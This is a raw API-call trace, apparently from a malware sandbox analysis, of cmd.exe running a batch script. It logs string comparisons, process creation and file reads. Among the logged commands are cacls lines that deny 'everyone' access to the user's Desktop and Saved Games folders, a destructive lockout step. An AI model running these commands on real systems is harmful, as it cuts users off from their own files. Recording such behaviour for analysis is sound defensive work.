_wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0035.284] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0035.284] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0035.284] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0035.284] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0035.284] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0035.284] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0035.284] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0035.284] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0035.284] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0035.284] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0035.284] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0035.284] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.284] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.284] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.284] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.285] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.285] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.285] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.285] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.285] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.285] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0035.285] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0035.285] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0035.285] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0035.285] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0035.285] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0035.285] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0035.285] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0035.285] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0035.285] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0035.285] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0035.285] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0035.285] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0035.285] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"C:\\Users\\5JgHKoaOfdp\\Desktop\\*.*\" /e /d everyone", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8ee00*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"C:\\Users\\5JgHKoaOfdp\\Desktop\\*.*\" /e /d everyone", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ee4c | out: lpCommandLine="cacls \"C:\\Users\\5JgHKoaOfdp\\Desktop\\*.*\" /e /d everyone", lpProcessInformation=0xc8ee4c*(hProcess=0x80, hThread=0x94, dwProcessId=0xb0c, dwThreadId=0xb24)) returned 1 [0035.360] CloseHandle (hObject=0x94) returned 1 [0035.360] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0035.360] GetEnvironmentStringsW () returned 0xd1b020* [0035.360] FreeEnvironmentStringsA (penv="=") returned 1 [0035.360] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ee78 | out: lpAttributeList=0xc8ee78) [0035.360] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0035.360] _close (_FileHandle=4) returned 0 [0035.360] WaitForSingleObject (hHandle=0x8c, dwMilliseconds=0xffffffff) returned 0x0 [0035.416] GetExitCodeProcess (in: hProcess=0x8c, lpExitCode=0xc8f1c0 | out: lpExitCode=0xc8f1c0*=0x0) returned 1 [0035.416] CloseHandle (hObject=0x8c) returned 1 [0035.416] WaitForSingleObject (hHandle=0x80, dwMilliseconds=0xffffffff) returned 0x0 [0035.558] GetExitCodeProcess (in: hProcess=0x80, lpExitCode=0xc8f1c0 | out: lpExitCode=0xc8f1c0*=0x0) returned 1 [0035.558] CloseHandle (hObject=0x80) returned 1 [0035.559] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.559] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0035.559] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.559] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0035.559] _get_osfhandle (_FileHandle=0) returned 0x24 [0035.559] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0035.559] SetConsoleInputExeNameW () returned 0x1 [0035.559] GetConsoleOutputCP () returned 0x1b5 [0035.559] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0035.559] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.559] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x80 [0035.560] _open_osfhandle (_OSFileHandle=0x80, _Flags=8) returned 3 [0035.560] _get_osfhandle (_FileHandle=3) returned 0x80 [0035.560] SetFilePointer (in: hFile=0x80, lDistanceToMove=669, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0035.561] _get_osfhandle (_FileHandle=3) returned 0x80 [0035.561] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0035.561] ReadFile (in: hFile=0x80, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x7d1, lpOverlapped=0x0) returned 1 [0035.561] SetFilePointer (in: hFile=0x80, lDistanceToMove=736, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0035.561] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=67, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" /e /d everyone\r\n=%%i\r\n") returned 67 [0035.561] GetFileType (hFile=0x80) returned 0x1 [0035.561] _get_osfhandle (_FileHandle=3) returned 0x80 [0035.561] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0035.561] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="5JgHKoaOfdp") returned 0xb [0035.562] _wcsicmp (_String1="echo", _String2=")") returned 60 [0035.562] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0035.562] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0035.562] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0035.562] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0035.562] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0035.562] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0035.562] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0035.562] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0035.562] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0035.562] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0035.562] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0035.562] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0035.562] _tell (_FileHandle=3) returned 736 [0035.562] _close (_FileHandle=3) returned 0 [0035.562] _pipe (in: _PtHandles=0xd25fa0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0xd25fa0) returned 0 [0035.562] _dup (_FileHandle=1) returned 5 [0035.562] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0035.563] _close (_FileHandle=4) returned 0 [0035.563] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0035.563] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0035.563] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0035.563] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0035.563] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0035.563] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0035.563] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0035.563] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0035.563] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0035.563] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0035.563] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0035.563] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0035.563] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0035.563] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0035.563] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0035.563] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0035.563] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0035.563] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0035.563] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0035.563] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0035.563] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0035.563] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0035.563] SetErrorMode (uMode=0x0) returned 0x0 [0035.563] SetErrorMode (uMode=0x1) returned 0x0 [0035.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x208, lpBuffer=0xd18270, lpFilePart=0xc8ecc4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0xc8ecc4*="system32") returned 0x13 [0035.563] SetErrorMode (uMode=0x0) returned 0x1 [0035.564] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\system32\\.") returned 1 [0035.564] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0035.564] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.564] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe", fInfoLevelId=0x1, lpFindFileData=0xc8ea70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea70) returned 0xd183b0 [0035.564] FindClose (in: hFindFile=0xd183b0 | out: hFindFile=0xd183b0) returned 1 [0035.564] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0035.564] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0035.564] GetConsoleTitleW (in: lpConsoleTitle=0xc8ef4c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0035.564] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ee78, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ee5c | out: lpAttributeList=0xc8ee78, lpSize=0xc8ee5c) returned 1 [0035.564] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ee78, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ee64, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ee78, lpPreviousValue=0x0) returned 1 [0035.564] GetStartupInfoW (in: lpStartupInfo=0xc8eeb0 | out: lpStartupInfo=0xc8eeb0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0035.564] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0035.564] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0035.564] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0035.564] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0035.564] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.564] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.564] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.564] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0035.564] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0035.564] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0035.564] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0035.564] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0035.564] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0035.564] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0035.564] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0035.564] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0035.565] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0035.565] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0035.565] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0035.565] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.565] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.565] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.565] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.565] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.565] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.565] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.565] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.565] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.565] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0035.565] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0035.565] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0035.565] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0035.565] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0035.565] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0035.565] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0035.565] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0035.565] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0035.565] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0035.565] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0035.565] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0035.565] lstrcmpW (lpString1="\\cmd.exe", lpString2="\\XCOPY.EXE") returned -1 [0035.565] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8ee00*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ee4c | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", lpProcessInformation=0xc8ee4c*(hProcess=0x94, hThread=0x8c, dwProcessId=0xb48, dwThreadId=0xb4c)) returned 1 [0035.569] CloseHandle (hObject=0x8c) returned 1 [0035.569] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0035.569] GetEnvironmentStringsW () returned 0xd15f98* [0035.569] FreeEnvironmentStringsA (penv="=") returned 1 [0035.569] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ee78 | out: lpAttributeList=0xc8ee78) [0035.569] _get_osfhandle (_FileHandle=3) returned 0x80 [0035.569] DuplicateHandle (in: hSourceProcessHandle=0x94, hSourceHandle=0x80, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0035.569] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0035.569] _close (_FileHandle=5) returned 0 [0035.569] _dup (_FileHandle=0) returned 4 [0035.569] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0035.569] _close (_FileHandle=3) returned 0 [0035.569] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0035.569] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0035.570] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0035.570] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0035.570] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0035.570] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0035.570] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0035.570] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0035.570] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0035.570] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0035.570] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0035.570] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0035.570] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0035.570] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0035.570] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0035.570] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0035.570] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0035.570] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0035.570] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0035.570] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0035.570] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0035.570] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0035.570] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0035.570] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0035.570] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0035.570] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0035.570] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0035.570] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0035.570] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0035.570] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0035.570] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0035.570] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0035.570] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0035.570] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0035.570] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0035.570] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0035.570] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0035.570] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0035.570] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0035.570] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0035.570] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0035.570] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0035.570] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0035.570] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0035.570] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0035.570] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0035.570] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0035.570] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0035.570] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0035.570] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0035.570] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0035.570] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0035.570] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0035.570] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0035.570] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0035.570] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0035.570] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0035.570] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0035.570] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0035.571] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0035.571] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0035.571] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0035.571] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0035.571] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0035.571] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0035.571] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0035.571] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0035.571] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0035.571] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0035.571] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0035.571] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0035.571] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0035.571] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0035.571] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0035.571] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0035.571] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0035.571] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0035.571] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0035.571] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0035.571] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0035.571] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0035.571] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0035.571] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0035.571] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0035.571] _wcsicmp (_String1="cacls", _String2="FOR") returned -3 [0035.571] _wcsicmp (_String1="cacls", _String2="IF") returned -6 [0035.571] _wcsicmp (_String1="cacls", _String2="REM") returned -15 [0035.571] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0035.571] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0035.571] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0035.571] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0035.571] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0035.571] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0035.571] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0035.571] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0035.571] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0035.571] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0035.571] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0035.571] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0035.571] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0035.571] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0035.571] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0035.571] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0035.571] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0035.571] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0035.571] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0035.571] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0035.572] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0035.572] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0035.572] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0035.572] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0035.572] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0035.572] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0035.572] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0035.572] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0035.572] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0035.572] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0035.572] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0035.572] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0035.572] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0035.572] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0035.572] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0035.572] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0035.572] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0035.572] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0035.572] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0035.572] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0035.572] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 